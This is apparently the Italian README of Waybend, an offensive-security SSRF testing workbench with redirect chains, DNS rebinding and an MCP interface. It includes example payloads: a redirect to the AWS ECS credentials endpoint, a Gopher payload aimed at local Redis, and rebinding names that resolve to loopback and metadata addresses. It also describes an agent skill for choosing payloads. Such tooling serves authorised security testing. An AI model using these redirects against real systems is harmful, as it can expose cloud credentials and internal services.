
Workbench self-hosted per SSRF redirect, payload, callback e DNS
Infrastruttura SSRF self-hosted per catene di redirect, payload di protocollo esatti, callback, DNS rebinding e raccolta di evidenze sulle richieste. Un singolo binario Rust fornisce il workbench web, l'API JSON, il responder DNS autoritativo e l'interfaccia MCP su stdio.
Installa con Homebrew:
brew install principlebreach/tap/waybend
Le release con tag pubblicano anche binari firmati per Linux, macOS e Windows
nella pagina delle release,
oltre a un container multi-piattaforma su ghcr.io/principlebreach/waybend.
Compila dai sorgenti con Rust 1.88 o superiore:
git clone https://github.com/PrincipleBreach/waybend.git
cd waybend
cargo build --release --locked
waybend init waybend.yml
waybend validate --config waybend.yml
waybend serve --config waybend.yml
Apri http://localhost:8080. Ogni voce del catalogo mostra sia l'URL Waybend
pronto da copiare sia il suo esatto target finale:
Waybend URL http://localhost:8080/r/aws-ecs-v2?token=case-17
Final target http://169.254.170.2/v2/credentials/
Usa Docker Compose per un deployment locale persistente:
cp waybend.example.yml waybend.yml
docker compose up --build -d
Consulta Per iniziare per container, binari nativi, validazione e il primo test di redirect.
Il catalogo copre metadata cloud, forme di indirizzi loopback e di rete privata, differenziali dei parser URL, target su file locali e route Gopher incapsulate nel protocollo. Il confine del protocollo e i riferimenti principali sono documentati in Payload di protocollo.
Cerca o esporta il catalogo senza avviare un server:
waybend catalog --config waybend.yml --query metadata
waybend catalog --config waybend.yml --category internal-service --format csv
Costruisci un redirect dinamico che preserva i byte:
waybend encode --config waybend.yml --status 307 --hops 2 \
'Gopher://127.0.0.1:6379/_INFO%0D%0APING'
Correla una route con ?token=<value>, poi interroga le sue osservazioni:
waybend evidence --config waybend.yml list --token case-17 --json
Esegui waybend --help o waybend <command> --help per la superficie dei
comandi installati.
Avvia il server MCP su standard input/output:
waybend mcp --config /absolute/path/to/waybend.yml
Espone search_payloads, get_payload, build_redirect, dns_rebind_name e
list_evidence. La skill Waybend guida un agente a
selezionare un insieme mirato di payload, preservare i byte del protocollo,
riutilizzare un unico token di correlazione e riportare le evidenze osservate.
Consulta Integrazione con gli agenti per la configurazione del client MCP, gli schemi degli strumenti e l'installazione della skill.
Delega una zona a Waybend, abilita il DNS e pubblica sia la porta 53 UDP sia TCP. I nomi di query codificano un comportamento statico, alternato o TOCTOU deterministico:
127-0-0-1.static.rb.example.com
198-51-100-10.127-0-0-1.alt.rb.example.com
198-51-100-10.169-254-169-254.2.toctou.rb.example.com
Prefissa un nome con t-<token>. per unire le evidenze DNS e HTTP. Consulta
DNS rebinding per delega, codifica IPv6 e regole di sequenza.
Leggi CONTRIBUTING.md. Segnala le vulnerabilità tramite SECURITY.md.
MIT — vedi LICENSE.
Built by Principle Breach — offensive security research.